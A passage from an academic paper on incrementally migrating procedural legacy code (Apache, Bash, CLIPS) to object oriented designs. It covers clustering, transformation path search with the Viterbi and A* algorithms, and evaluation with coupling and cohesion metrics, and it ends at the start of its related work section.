The migration process can be constructed as a sequence of transformations, as depicted in Figure 1. Each transformation alters the state of the software system by converting a data type to a class candidate, associating a method with a class candidate, or defining inheritance associations. These transformations are repeated until the final object oriented system is obtained. Each transformation affects the features appearing as leaves in the quality soft-goal graph; consequently, we can assess whether a transformation has a positive impact on the modeled quality. The objective thus is to identify the combination of transformations that best meets the quality requirements for the target migrant system. We define the migration process as follows.
Definition 1: A quality driven migration process is a tuple $< S, I, F, T, G, V, A, \xrightarrow{a}>$.
- $S$ is a set of non-empty states, $S_0, S_1, ..., S_i, S_{i+1}, ..., S_n$. The state $S_0$ represents the original software system. The set $S$ can contain more than one final state; these correspond to different resulting migrant systems (i.e., alternative object models), or to an empty state that denotes failure. The states between the initial state and the final states represent snapshots of the migration process, whereby a mix of procedural and object oriented models exists as the system evolves from its original procedural state to a fully object oriented final state.
- $I$ represents the initial state $S_0$.

\[\text{Figure 1. Quality Driven Software Migration Framework}\]
• \( F \) represents a set of final states that correspond to different object models for the initial procedural system.
• \( T \) is a catalogue of transformations, \( t_{01}, t_{12}, \ldots, t_{i,i+1}, \ldots \), each of which alters a state and yields a consecutive state. These transformations aim to convert a software system in a stepwise fashion from its initial state (the original procedural system) to a final state (the new object oriented system). \( t_{ij} \) represents a transformation moving from \( s_i \) to \( s_j \).
• \( G \) is a set of soft-goal interdependency graphs that elaborate high-level non-functional requirements into measurable source code features.
• \( V \) is a set of feature vectors, \( v_{0}, v_{1}, ..., v_{n} \), in which \( v_{i} \) is the feature vector for \( s_i \), represented as \( < (f_{1}, a_{1}), (f_{2}, a_{2}), ..., (f_{k}, a_{k}) > \), where \( f_{j} \) is a terminal feature in the soft-goal interdependency graphs and \( a_{j} \) is the metric value of this feature in state \( s_{i} \).
• \( A \) is a set of actions, \( a_{0}, a_{1}, ..., a_{j}, a_{j+1}, ..., a_{n} \), each of which is a pair of a transformation, \( t_{ij} \), and its quality likelihood, \( \lambda_{ij} \), indicating the degree to which the transformation contributes towards a desired quality goal.
• \( \xrightarrow{a} \subseteq S \times A \times S \) is a set of transformation rules, which define the semantic meaning and constraints of each transformation. Transformations in \( T \) are selected from a transformation rule catalog [5].
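The elements of Definition 1 can be sketched as minimal Java types; the likelihood-product scoring mirrors how path likelihoods compose (as in the hierarchical state modeling of Section 3.3), and all names are illustrative:

```java
import java.util.ArrayList;
import java.util.List;

// Illustrative types for Definition 1: a transformation t_ij moves
// state s_i to state s_j; an action pairs a transformation with its
// quality likelihood lambda_ij; a full transformation path's score
// is the product of the likelihoods along the path.
public class MigrationPath {
    static class Transformation {
        final int fromState, toState; // s_i -> s_j
        Transformation(int from, int to) { fromState = from; toState = to; }
    }

    static class Action {
        final Transformation t;
        final double likelihood; // lambda_ij in Definition 1
        Action(Transformation t, double likelihood) {
            this.t = t;
            this.likelihood = likelihood;
        }
    }

    // Likelihood score of a full transformation path s_0 -> ... -> s_n.
    static double pathScore(List<Action> path) {
        double score = 1.0;
        for (Action a : path) score *= a.likelihood;
        return score;
    }

    public static void main(String[] args) {
        List<Action> path = new ArrayList<>();
        path.add(new Action(new Transformation(0, 1), 0.9));
        path.add(new Action(new Transformation(1, 2), 0.5));
        System.out.println(pathScore(path)); // 0.45
    }
}
```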
As illustrated in Figure 2, a full transformation path can be formed by the composition of transformations from the original state to the final states. For example, three possible class candidates can be identified along the paths from the original state to the final states.
3. Incremental Migration Process
Legacy software systems are usually large systems. Our proposed approach must scale well to handle the migration of these systems. In this section, we present two enhancements to our quality driven migration approach. Firstly, we present a technique to break a large system into a set of clusters. Each cluster is migrated independently. By applying the proposed quality driven migration framework on the clusters, a partial object model can be identified from each cluster and merged incrementally into a full object model that produces a final migrated system. Secondly, we modify the Viterbi algorithm with constraints on the number of states generated, in order to reduce the search space for the optimal transformation path.
3.1 System Segmentation
To reduce the time and space requirements needed to migrate a large legacy system in one sweep, we break the legacy system into clusters. Most clustering techniques presented in the literature utilize certain criteria to decompose a system into a set of meaningful modular clusters. Such criteria attempt to achieve a cluster with low coupling, high cohesion, minimal interface or sharing. In the context of our research, our objective is to produce clusters that have the least data dependencies on other clusters. This would enable us to migrate clusters independently. Moreover, the order of selecting which cluster to migrate would have no effect on the final object model. To achieve this objective, each cluster contains the maximum number of source code entities that are related to a class candidate. A source code entity that initiates the formation of a cluster is called a seed. Other entities that associate with this seed entity are used to form a cluster.
An association is a directed edge from a seed to its related entities.
A seed, referred to as \( T_i \), is selected according to its potential to be considered as a class candidate in the final migrated system. In this context, a seed entity can be chosen from aggregate data types, global variable declarations, and function pointer declarations. Specifically, the aggregate data types include `struct` type definitions, `union` type definitions, `arrays`, and `enumeration` definitions. In this case, fields in an aggregate data type become data members in a class candidate. Similarly, a global variable is encapsulated as a data member in a class candidate. Moreover, a function pointer declaration is also treated as a seed entity, for the reason that a function pointer declaration defines a type for the functions passed as parameters.
Due to the object oriented design principle that a class encapsulates data and related methods, we focus on the discovery of relations between the seed and other data types and functions that use the seed. These relations can be type references, data updates, or data uses. Specifically, a seed type can be referred to by functions and by data fields of other data types. The entities associated with the seed are represented as a set of data type declarations, \( \{T_i\} \), and a set of functions, \( \{F_i\} \). We define a cluster as a tuple, described in Definition 2.
**Definition 2:** A cluster is represented as a tuple, \( <T_i, M_{T_i}, R_{T_i}> \).
- \( T_i \), the seed of a cluster, has a potential to become a candidate class
- \( M_{T_i} \) is a set of functions that use or update the seed \( T_i \)
- \( R_{T_i} \) is a set of data types that have data fields referred to the seed \( T_i \)
The system decomposition process is conducted in the following steps:
1. Identify the possible seeds;
2. Associate the related entities with each seed;
3. Generate a set of clusters, denoted as a set of tuples, \( \{<T_i, M_{T_i}, R_{T_i}>\} \).
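The three steps can be sketched as follows, assuming simple name-based lookup tables in place of AST analysis (the data model is illustrative, not the toolkit's actual implementation):

```java
import java.util.ArrayList;
import java.util.List;
import java.util.Map;
import java.util.Set;

// Sketch of Definition 2 and the three segmentation steps:
// 1) identify seeds, 2) associate related entities with each seed,
// 3) emit clusters <T_i, M_Ti, R_Ti>. Inputs are simplified
// name-based tables rather than a real AST.
public class Segmentation {
    static class Cluster {
        final String seed;                 // T_i: seed of the cluster
        final Set<String> functions;       // M_Ti: functions using/updating T_i
        final Set<String> referringTypes;  // R_Ti: types with fields referring to T_i
        Cluster(String seed, Set<String> fs, Set<String> ts) {
            this.seed = seed; this.functions = fs; this.referringTypes = ts;
        }
    }

    static List<Cluster> segment(Set<String> seeds,
                                 Map<String, Set<String>> usedBy,       // seed -> functions
                                 Map<String, Set<String>> referredBy) { // seed -> types
        List<Cluster> clusters = new ArrayList<>();
        for (String seed : seeds) {
            clusters.add(new Cluster(seed,
                    usedBy.getOrDefault(seed, Set.of()),
                    referredBy.getOrDefault(seed, Set.of())));
        }
        return clusters;
    }

    public static void main(String[] args) {
        // The example of Figure 3: C0 = <T0, {F0, F1}, {T1}>.
        Map<String, Set<String>> usedBy = Map.of("T0", Set.of("F0", "F1"));
        Map<String, Set<String>> referredBy = Map.of("T0", Set.of("T1"));
        List<Cluster> cs = segment(Set.of("T0"), usedBy, referredBy);
        System.out.println(cs.get(0).seed + " " + cs.get(0).functions);
    }
}
```

Shared entities would be duplicated into each cluster's sets, so a cluster can be migrated without consulting its neighbors.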
Figure 3 illustrates a result of system segmentation, where three clusters have been identified:
\[
C_0 = <T_0, \{F_0, F_1\}, \{T_1\}>, \\
C_1 = <T_1, \{F_2, F_4\}, \emptyset>, \\
C_2 = <T_2, \{F_3, F_4\}, \{T_1\}>
\]
As illustrated in this example, the system segmentation process allows overlapping entities between clusters. When an overlap occurs on aggregate data types, it may indicate a multiple inheritance relationship among the class candidates generated from each cluster. If an overlap occurs on functions, it reflects conflicts in methods. In this case, multiple possible transformation paths can be generated by assigning the methods to alternative class candidates. The migration process framework (described in Section 2) provides a qualitative method to determine the class candidate to which the function should be attached. Finally, to select and migrate a cluster independently, without relying on the information in other clusters, shared entities among clusters are duplicated in each cluster. Some functions may not be related to any seeds; these are grouped into a “leftover” cluster.
### 3.2 System Amalgamation
The system segmentation process decomposes the program into a set of smaller clusters, which contain the ASTs of segments of the procedural code to be migrated. In this respect, the migration process is divided into phases, as depicted in Figure 4. Each phase transforms one cluster into an object model. In particular, the initial object model \( OM_0 \) is empty in the first phase. After the transformation of Cluster 1, \( C_1 \), the first object model \( OM_1 \) is generated and serves as input to the second phase, along with a new cluster. Consequently, after each phase a new intermediate object model, \( OM_k \), is generated and serves as an input to the following reengineering phase. In this sense, the results from the present phase and the preceding phase are merged, and a new intermediate object model is produced.
The amalgamation process iterates over each cluster, and updates the system object model. The transformations in each cluster are performed in four steps:
1. Generate a new class which is added into the object model;
2. Assign functions from the set of associated functions to the new class candidate, and update the object model;
3. Resolve conflicts when a function can be assigned to either the newly identified class candidate or to existing class candidates in the object model;
4. Identify inheritance relations between the newly identified class candidate and the existing classes, and update the object model.
In a nutshell, the proposed quality driven migration approach is applied iteratively to every cluster. In each cluster, the migration process is divided into a sequence of states and transformations. During the migration of the first cluster, the initial state represents the purely procedural code of the cluster. Once the optimal path in a cluster is identified, the final state of that path serves as the initial state for the next cluster. The object model is incrementally expanded by identifying additional classes from the new clusters. For example, the clusters in Figure 3 are used to illustrate the application of the amalgamation process using the quality driven migration framework. In this example, the amalgamation process is divided into three phases (a phase for each cluster), as depicted in Figure 4. In each phase, one cluster is migrated by following the four steps described above. The evolution of the object model in each state is specified in Table 1. In Phase 1, cluster $C_0 = \langle T_0, \{F_0, F_1\}, \{T_1\} \rangle$ serves as the input. Two states are generated, $\{s_0, s_1\}$. In $s_0$, $T_0$ is identified as a class. In $s_1$, two methods, $F_0$ and $F_1$, are assigned to class $T_0$. In Phase 2, $C_1 = \langle T_1, \{F_2, F_4\}, \emptyset \rangle$ serves as input along with the object model (OM 1) from Phase 1. $T_1$ is identified as a new class from $C_1$ in $s_0$. In $s_1$, two methods, $F_2$ and $F_4$, are assigned to $T_1$. There are no methods in conflict in Phase 2. As shown in Figure 3, $T_1$ is a data type and one or more of its data fields refer to $T_0$. This indicates that an inheritance relation exists between these two types. The class inheritance is determined based on the context of the usage of $T_0$ and $T_1$ in the source code and a set of heuristics. For this example, the class inheritance identification is omitted (see [5]).
In Phase 3, $C_2 = \langle T_2, \{F_3, F_4\}, \{T_1\} \rangle$ serves as input to the migration process along with the object model (OM 2) from Phase 2. In $s_0$, $T_2$ is the new class identified from $C_2$. In $s_1$, two methods: $F_3$ and $F_4$ are assigned to $T_2$. $T_2$ and $T_1$ have common method $F_4$. Therefore method $F_4$ is in conflict.
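The branching described above can be sketched as follows. Because each conflicting method's assignment is independent in this toy model, the optimal path simply takes the larger-likelihood branch at each level of the binary tree; the likelihood values are hypothetical:

```java
// Sketch of method-conflict resolution: each conflicting method is
// assigned to one of two candidate classes, the transformation paths
// form a binary tree, and the branch with the larger likelihood is
// kept at every level. Likelihood values here are hypothetical.
public class ConflictResolution {
    // likelihoods[m][0] = likelihood of assigning method m to class A,
    // likelihoods[m][1] = likelihood of assigning it to class B.
    static String resolve(double[][] likelihoods) {
        StringBuilder assignment = new StringBuilder();
        for (double[] l : likelihoods) {
            // Choices are independent, so maximizing the product of
            // likelihoods reduces to a per-method maximum.
            assignment.append(l[0] >= l[1] ? 'A' : 'B');
        }
        return assignment.toString();
    }

    public static void main(String[] args) {
        // One conflicting method (e.g. F4 between T1 and T2 in Phase 3).
        double[][] likelihoods = { { 0.4, 0.7 } };
        System.out.println(resolve(likelihoods)); // "B"
    }
}
```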
It is possible that only part of a system is migrated. The rest of the non migrated system can be handled in two ways: 1) Each remaining cluster is grouped into one class. All aggregate types and variable declarations in the cluster become public data attributes of the newly created class. The functions in a cluster become public methods of the class. In this way, the whole system is converted into an object oriented design. This brute force migrated object oriented design will likely not have as high a quality as one derived using our migration framework. 2) Alternatively, the rest of the non migrated system may be considered as one big component. By the use of wrapping techniques, the rest of the non migrated system and the newly identified object oriented system can interact using middleware technologies. Various wrapping and middleware technologies are presented in [6].
3.3 Transformation Path Generation
In our quality driven migration approach, we consider the transformation path with the highest likelihood score to be the path most likely to produce the highest quality in a migrated system. Therefore, a main emphasis of our migration approach is to determine the optimal transformation path. We use the Viterbi algorithm to generate all the transformation paths and identify the optimal path. A drawback of using the Viterbi algorithm is the need to retain all states and paths before identifying an optimal path. In our research, we developed a number of heuristics to reduce the number of generated states and the time required to find the optimal path. These heuristics are essential to permit our approach to migrate large legacy systems with reasonable resource requirements. They are discussed below.
Transformation rule application constraints
Transformation rules provide a means to implement generic migration steps. Each rule alters a set of source code features. We associate pre- and post-conditions with each transformation rule to efficiently specify constraints on applying transformation rules to procedural code features.
In the migration process, pre-conditions are the procedural source code features that a transformation can operate on and convert them into object oriented structures, as specified in post-conditions. Therefore, the pre/post conditions indicate the order to apply the transformations on states, and place constraints on the expansion of the optimal transformation path search tree.
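One way to sketch this guard mechanism: a state is abstracted as the set of source code features it exhibits, and a rule fires only when its pre-condition features are present (the feature names are invented for illustration):

```java
import java.util.HashSet;
import java.util.Set;

// Sketch of transformation-rule application guarded by pre/post
// conditions. A state is abstracted as the set of source code
// features it currently exhibits; feature names are hypothetical.
public class RuleApplication {
    static class Rule {
        final Set<String> pre;   // procedural features the state must have
        final Set<String> post;  // object oriented features it produces
        Rule(Set<String> pre, Set<String> post) { this.pre = pre; this.post = post; }
    }

    // Returns the successor state, or null when the rule is not
    // applicable; the guard prunes branches of the transformation
    // path search tree.
    static Set<String> apply(Set<String> state, Rule rule) {
        if (!state.containsAll(rule.pre)) return null;
        Set<String> next = new HashSet<>(state);
        next.removeAll(rule.pre);
        next.addAll(rule.post);
        return next;
    }

    public static void main(String[] args) {
        Rule structToClass = new Rule(Set.of("struct-decl"), Set.of("class-candidate"));
        Set<String> s0 = new HashSet<>(Set.of("struct-decl", "global-var"));
        System.out.println(apply(s0, structToClass));
    }
}
```

A rule whose pre-condition is not met returns no successor, so that branch of the search tree is never expanded.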
Hierarchical state modeling
When a segment of the search tree contains a sequence of states in a single path, these states can be collapsed into one composite state. The likelihood of the composite state is equal to the product of the likelihoods of the transformations along the single path inside the composite state. For example, as illustrated in Figure 4, \( s_0 \) and \( s_1 \) of Phase 3 can be merged into one state to reduce the number of states generated, because no other states emanate from \( s_0 \). This merging does not affect the choice of the optimal transformation path.
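The collapsing rule can be sketched directly: a chain of states with one outgoing transformation each becomes a single composite state whose likelihood is the product along the chain:

```java
// Sketch of hierarchical state collapsing: a linear chain of states
// s_a -> s_b -> ... with a single outgoing transformation each is
// merged into one composite state; its likelihood is the product of
// the transformation likelihoods along the chain.
public class CompositeState {
    static double collapse(double[] chainLikelihoods) {
        double composite = 1.0;
        for (double l : chainLikelihoods) composite *= l;
        return composite;
    }

    public static void main(String[] args) {
        // e.g. s0 -> s1 -> s2 collapsed into one composite state
        System.out.println(collapse(new double[] { 0.9, 0.8 }));
    }
}
```

Because the chain has no branching, replacing it by its product leaves every path comparison, and hence the optimal path, unchanged.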
Incremental object model generation
By adopting the incremental migration approach described in Sections 3.1 and 3.2, we reduce the complexity and the size of the optimal transformation path search tree. At each cluster, we concentrate on identifying one class candidate, building the search tree for this one class candidate, and updating the system object model incrementally, one class at a time.
Implementation considerations
The implementation of the system states is crucial in reducing the complexity of the proposed state transition approach. The main idea is to simplify the representation of states and minimize the space required to retain states in memory.
Sub-optimality to achieve performance
Sub-optimality refers to the number of applied transformations and how well the desired quality objectives are met in the new migrated system. The Viterbi algorithm used to locate the optimal path requires the generation of all possible paths. This limits the applicability of our migration approach, as we may need to generate a large number of paths even for medium size systems. Alternatively, we can use the A* algorithm, which avoids expanding every state; in this case, less promising transformations may be discarded even though they could later have led to an optimal result. Therefore we may locate a sub-optimal transformation path. We limit the application of A* to clusters with a large number of states, to ensure that we achieve the optimal path for most of the clusters.
4. Case Studies
To investigate the effectiveness of the incremental quality driven migration framework, a comprehensive set of case studies is conducted and presented in this section. The case studies are performed on three medium size open source procedural systems from different domains: 1) the Apache Web Server, 2) the BASH Unix Shell, and 3) the CLIPS Expert System Builder. Table 2 illustrates the source code related characteristics of these systems. A prototype software toolkit is developed based on the theoretical approach described in this paper.
In this section, we firstly give an overview of the toolkit implementation and highlight the scalability and performance issues that may arise during the migration process. Secondly, we study the efficiency of the system segmentation process. Thirdly, we evaluate the complexity of the state transition approach. Finally, we examine the quality of the migrated systems, and verify that the migrated system generated from the optimal path achieves the highest quality.
### 4.1 Incremental Migration Steps
The toolkit implements the proposed incremental quality driven migration in seven steps, as illustrated in Figure 5:
**Step 1:** The original legacy system is parsed and represented in terms of its Abstract Syntax Tree (AST).
**Step 2:** Using the techniques described in Section 3.1, we decompose the AST into several clusters. Each cluster is intended to include the source code features related to a class candidate.
**Step 3:** We defined a generic procedural language domain that contains the common constructs of various procedural languages. Due to space limitations, we do not cover this generic procedural language domain here [2]. The AST of each cluster is converted to conform to this generic procedural language domain and is represented in XML. In this way, we can use a set of generic transformations that migrate procedural systems written in different procedural languages into functionally similar object oriented systems. The generated XML documents are placed in a central repository.
**Step 4:** The high-level quality requirements for the target migrant systems are elicited based on domain knowledge, customer interviews or documentation. The focal point is to refine the high-level quality requirements into measurable design decisions and source code features. The refinement process is modeled using soft-goal interdependency graphs.
**Step 5:** The migration process operates iteratively on each cluster, as described in Section 3.2. For each cluster, we apply the proposed quality driven migration process. We then update the overall system object model with the newly identified object model from the processed cluster.
**Step 6:** The quality evaluation process selects the object model with the best quality using the Viterbi algorithm and computes quality improvement likelihood scores. We validate that the target object model achieves high cohesion and low coupling using six object oriented metrics.
**Step 7:** Once all the clusters are migrated, a final object model is obtained. The object oriented code is generated from the object model with the highest quality.
---
**Table 2. Characteristics of the Procedural Systems**
<table>
<thead>
<tr>
<th>Systems</th>
<th>Apache</th>
<th>Bash</th>
<th>Clips</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lines of Code</td>
<td>37,033</td>
<td>27,521</td>
<td>34,301</td>
</tr>
<tr>
<td>Num. of Files</td>
<td>42</td>
<td>39</td>
<td>40</td>
</tr>
<tr>
<td>Num. of Functions</td>
<td>709</td>
<td>998</td>
<td>736</td>
</tr>
<tr>
<td>Num. of Aggr. Types</td>
<td>184</td>
<td>79</td>
<td>151</td>
</tr>
<tr>
<td>Num. of Global Vars</td>
<td>103</td>
<td>227</td>
<td>186</td>
</tr>
</tbody>
</table>
4.2 Experiments on System Segmentation
In this section, we present experiments that measure the average size of the clusters generated by the system segmentation algorithm. The size of clusters is crucial for the success of a reengineering project due to the amount of computation resources needed. In particular, the representation of Abstract Syntax Trees in an XML format (Step 3) increases the size of the source code representation dramatically. For example, the CLIPS system (34 KLOC) represented in XML requires 38MB. Furthermore, due to the possibly large size of the procedural system, it may become an intractable task to migrate the entire code of a large system in one sweep. The system segmentation algorithm reduces a large procedural system into a set of manageable clusters. The average disk space for each cluster is illustrated in Figure 6. The X axis represents the number of clusters; the Y axis refers to the average disk space of a cluster over that number of clusters, computed using Formula 1. The clusters are measured in the order of their generation during the segmentation phase. Figure 6 shows several peaks because the generation of a large cluster increases the average size of the clusters.
\[
\text{Average Size of Clusters} = \frac{\sum_{i=1}^{K} \text{Size of Cluster}_i}{K}
\]
where \( K = 1, \ldots, M \), \( M \) is the total number of clusters
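Formula 1 can be sketched as a running average over the clusters, in generation order (the sizes below are hypothetical):

```java
// Formula 1: average size of the first K clusters, taken in the
// order the segmentation phase generated them.
public class ClusterStats {
    static double averageSize(long[] sizes, int k) {
        long sum = 0;
        for (int i = 0; i < k; i++) sum += sizes[i];
        return (double) sum / k;
    }

    public static void main(String[] args) {
        long[] sizes = { 100, 300, 2000 }; // hypothetical cluster sizes in Kbytes
        // A single large cluster produces a peak in the running
        // average, which explains the peaks seen in Figure 6.
        for (int k = 1; k <= sizes.length; k++)
            System.out.println("K=" + k + " avg=" + averageSize(sizes, k));
    }
}
```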
The results in Figure 6 illustrate that the average size of clusters is relatively small. For example, the average cluster size is 200 Kbytes for the Apache system, 400 Kbytes for Bash, and 400 Kbytes for Clips. Moreover, the largest cluster is approximately 2MB. These cluster sizes demonstrate that the proposed framework can operate on large systems at a steady rate without extraordinary resource requirements.
4.3 Complexity of the State Transition Approach
In this section, we present the complexity of the state transition approach used to identify an optimal transformation path. Essentially, the complexity of the approach can be measured in three aspects: 1) the number of states generated in a cluster, 2) the time required to process a cluster, 3) the memory needed to represent a state. Our objective is to validate that the incremental migration process can effectively shorten the search space and improve the scalability of the proposed framework.
As discussed in Section 3, the migration is conducted iteratively, one cluster at each step. A new class candidate is identified from the initial state and the overall system object model is updated. One method might be assignable to more than one class candidate. When a method assignment conflict is encountered, multiple states are generated to compute the optimal transformation path. To avoid the space explosion, it is critical to resolve conflicts in the scope of one cluster. In this context, the transformation paths are modeled by a binary tree, because each conflicting method is assigned to one of two classes. Moreover, we utilize the heuristics discussed in Section 3.3 to compress the states. Therefore, if there is no method in conflict, only one state exists in the cluster. The number of states is calculated by Formula (2), where \( n \) refers to the number of methods in conflict.
\[
\text{num.ofstates} = \sum_{i=0}^{n} 2^i
\]
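Formula (2) sums the binary tree level by level; a quick sketch confirms the closed form \(2^{n+1}-1\) and reproduces the 8,191-state value for 12 conflicting methods used in the discussion of Table 3:

```java
// Formula 2: number of states generated when n methods are in
// conflict, i.e. sum_{i=0}^{n} 2^i = 2^(n+1) - 1 (each conflict
// doubles the leaves of the binary transformation-path tree).
public class StateCount {
    static long numStates(int conflicts) {
        long states = 0;
        for (int i = 0; i <= conflicts; i++) states += 1L << i;
        return states; // equals (1L << (conflicts + 1)) - 1
    }

    public static void main(String[] args) {
        System.out.println(numStates(0));  // 1: no conflict, a single state
        System.out.println(numStates(12)); // 8191: the A* cutoff in Section 4.3
    }
}
```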
Figure 7 shows the distribution of states generated in the clusters. A large number of the clusters have only one state – 64% for Apache, 36% for Bash, and 27% for Clips. This is due to the state reduction heuristics described in Section 3.3. In addition, these clusters require minimal processing time, as there is no need to perform any optimal transformation path searching in them.
We also examine the average processing time for each cluster. Average processing time includes building a
### Table 3. Average Processing Time for Identifying Optimal Transformation Path
<table>
<thead>
<tr>
<th>Number of States</th>
<th>Apache (ms)</th>
<th>Bash (ms)</th>
<th>Clips (ms)</th>
</tr>
</thead>
<tbody>
<tr>
<td>3</td>
<td>75</td>
<td>155</td>
<td>70</td>
</tr>
<tr>
<td>7</td>
<td>249</td>
<td>230</td>
<td>387</td>
</tr>
<tr>
<td>15</td>
<td>586</td>
<td>348</td>
<td>569</td>
</tr>
<tr>
<td>31</td>
<td>1,582</td>
<td>990</td>
<td>701</td>
</tr>
<tr>
<td>63</td>
<td>2,628</td>
<td>1,656</td>
<td>930</td>
</tr>
<tr>
<td>127</td>
<td>8,687</td>
<td>3,671</td>
<td>3,939</td>
</tr>
<tr>
<td>255</td>
<td>N/A</td>
<td>6,453</td>
<td>5,278</td>
</tr>
<tr>
<td>511</td>
<td>41,968</td>
<td>14,554</td>
<td>4,101</td>
</tr>
<tr>
<td>1023</td>
<td>N/A</td>
<td>17,625</td>
<td>5,766</td>
</tr>
<tr>
<td>2047</td>
<td>N/A</td>
<td>121,562</td>
<td>18,515</td>
</tr>
<tr>
<td>4095</td>
<td>N/A</td>
<td>N/A</td>
<td>50,286</td>
</tr>
<tr>
<td>8191</td>
<td>N/A</td>
<td>123,828</td>
<td>2,099,672</td>
</tr>
</tbody>
</table>
Table 3 summarizes statistics of the states generated while identifying optimal transformation paths among the three examined systems. The table shows the results for the clusters that were processed using the Viterbi algorithm. Clusters with more than 8,191 states (i.e., more than 12 conflicting methods, using Formula 2) are processed using the A* algorithm; the processing time for these large clusters is small, as indicated in Figure 7. Moreover, Table 3 shows that the processing time grows approximately linearly with the number of states.
To measure the memory required to represent the generated states, we examine the space required for one state. The data structure representing one state is shown below in the class "State". Based on the Java data type definitions, the space required for keeping one state is approximately 320 bits (40 bytes), considering that an "int" and a reference each take 32 bits, and a "String" of 10 "char" values takes 160 bits. Therefore, the cluster with 8,191 states requires approximately 320 Kbytes to keep all the states in memory. As a result, the state transition approach does not impose a large memory requirement.
```java
public class State {
// state identification
int stateId;
// id of a conflicting method
String conflictingMethodId;
// id of the class candidate that a conflicting method is assigned to
int assignedClassCandidateId;
// a reference to the previous state
State preState;
// a reference to the next child state in the left branch
State leftState;
// a reference to the next child state in the right branch
State rightState;
}
```
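The per-state arithmetic can be checked directly; the bit sizes below are the paper's stated assumptions (32-bit ints and references, a 10-character String counted as 160 bits):

```java
// Reproduces the per-state size estimate from Section 4.3: two ints,
// three references (32 bits each under the stated assumption), and
// one 10-character String estimated at 160 bits.
public class StateMemory {
    static final int BITS_INT = 32, BITS_REF = 32, BITS_STRING10 = 160;

    static int bitsPerState() {
        // stateId + assignedClassCandidateId + conflictingMethodId
        // + preState + leftState + rightState
        return 2 * BITS_INT + BITS_STRING10 + 3 * BITS_REF;
    }

    public static void main(String[] args) {
        int bytesPerState = bitsPerState() / 8;
        System.out.println(bytesPerState);         // 40 bytes per state
        System.out.println(8191L * bytesPerState); // total bytes for 8,191 states
    }
}
```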
### 4.4 Quality Evaluation of the Migrant Systems
In the last two subsections, we presented results that verified that the presented incremental migration approach is scalable and can migrate medium size legacy procedural systems to object oriented systems. In this section, we verify that the approach can generate object oriented system with the highest maintainability and reusability. To achieve this objective, we conduct the case study as follows:
- Select other possible migrated systems and compare their quality with the migrated system generated from the optimal transformation path.
- To compare the quality of systems, collect a set of object oriented metrics to quantify direct measurable features, for example, coupling between classes and cohesion inside a class. The high cohesion and low coupling further indicate high maintainability and reusability.
- Analyze and compare the metric results from different systems.
To select other possible migrations of the same systems, we use the transformation path presented in our incremental migration approach. All transformation paths are generated and ordered in a sequence based on their attached likelihood scores. Several representative target systems can be generated from different paths. In the experiment, every path is assigned with a number in the range of 0 and 1. Such number shows a relative position of a path in the sequence. For example, the path labeled with 1 refers to the optimal path with the highest likelihood. The path labeled with 0 refers to the worst path with the lowest likelihood. Similarly, the path of 0.5 means the medium path whose likelihood is ranked in the middle of the highest likelihood and the lowest one. The path of 0.75 has the likelihood ranked in the middle of the optimal path and the medium path. Likewise, the path of 0.25 has the likelihood ranked in the middle of the medium path and the worst path. In such a way, we can generate five target systems from the paths of 0, 0.25, 0.5, 0.75 and 1. We can then compare the quality of these generated systems with the quality of the optimal migrated system.
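The selection of the five representative paths can be sketched as indexing into the likelihood-sorted path list at the chosen relative positions (the likelihood values are hypothetical):

```java
import java.util.Arrays;

// Sketch of representative-path selection: sort paths by likelihood
// ascending, then pick the paths at relative positions 0 (worst),
// 0.25, 0.5 (medium), 0.75, and 1 (optimal).
public class PathSelection {
    static double[] representatives(double[] likelihoods, double[] positions) {
        double[] sorted = likelihoods.clone();
        Arrays.sort(sorted); // ascending: index 0 = worst path
        double[] picked = new double[positions.length];
        for (int i = 0; i < positions.length; i++) {
            int idx = (int) Math.round(positions[i] * (sorted.length - 1));
            picked[i] = sorted[idx];
        }
        return picked;
    }

    public static void main(String[] args) {
        double[] likelihoods = { 0.2, 0.9, 0.5, 0.7, 0.4 }; // hypothetical scores
        double[] positions = { 0.0, 0.25, 0.5, 0.75, 1.0 };
        System.out.println(Arrays.toString(representatives(likelihoods, positions)));
        // [0.2, 0.4, 0.5, 0.7, 0.9]
    }
}
```

Each selected path is then used to generate a target system, whose metrics are compared against the system from the optimal path.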
To assess whether the desired goals in the target system have been achieved, a set of widely accepted object oriented software metrics is adopted. In the context of object oriented migration, we aim to achieve high cohesion and low coupling in the target object oriented systems. In this respect, coupling between classes can be measured using metrics such as CBO (Coupling Between Objects), DCC (Direct Class Coupling) and IFBC (Information Flow Between Classes) [7]. Moreover, the cohesion inside a class can be measured using metrics such as TCC (Tight Class Cohesion), Coh (Cohesion Measurement) and IFIC
[Figure 7. Comparison of Metric Results from Six Metrics. For each system (Apache, Bash, Clips), the plots show the metric value (Y axis) against the path choice (X axis) for six metrics: CBO (Coupling Between Objects), DCC (Direct Class Coupling), and IFBC (Information Flow Between Classes), for which low values are better; and IFIC (Information Flow Inside Class), LCOM (Lack of Cohesion Of Methods), and TCC (Tight Class Cohesion), for which high values are better.]
(Information Flow Inside Class) [7]. To reflect the overall value of the entire system in terms of one specific metric, we calculate the average of that metric's values over all classes. This set of metrics is different from the one we used to compute the transformation likelihoods. The overall results from the aforementioned six metrics are illustrated in Figure 7. The X-axis shows the choice of path; the Y-axis represents the metric values of the systems generated from the five selected paths. A single metric cannot reflect the overall quality of a system. For example, in the IFIC plot, the Apache system generated from the path of 1 has a lower IFIC value than the system generated from the path of 0.75, but its TCC and Coh values are higher. To compare the overall quality of two alternative systems, we therefore count the number of metrics on which the optimal system scores better than the alternative. Combining the results from all the metrics, we see that the final object-oriented system generated from the optimal path has the highest quality in comparison to the object-oriented systems generated from the alternative paths.
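The metric averaging and pairwise counting described above can be sketched as follows. The metric directions follow the legend of Figure 7; all numeric values are hypothetical:

```python
# Direction of each metric, per the Figure 7 legend:
# False = lower is better (coupling), True = higher is better (cohesion).
DIRECTIONS = {
    "CBO": False, "DCC": False, "IFBC": False,
    "IFIC": True, "LCOM": True, "TCC": True,
}

def system_metric(per_class_values):
    """System-level value of one metric: the average over all classes."""
    return sum(per_class_values) / len(per_class_values)

def wins(candidate, alternative):
    """Count the metrics on which `candidate` is strictly better,
    respecting each metric's direction."""
    count = 0
    for metric, higher_is_better in DIRECTIONS.items():
        c, a = candidate[metric], alternative[metric]
        if (c > a) if higher_is_better else (c < a):
            count += 1
    return count

# Hypothetical system-level metric values for two migrated systems
optimal = {"CBO": 2.1, "DCC": 1.8, "IFBC": 0.4, "IFIC": 0.7, "LCOM": 0.6, "TCC": 0.5}
medium  = {"CBO": 3.0, "DCC": 2.5, "IFBC": 0.6, "IFIC": 0.8, "LCOM": 0.4, "TCC": 0.3}
```

Here the system from the optimal path would win on five of the six metrics and so be judged the higher-quality system overall.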
5. Related Work
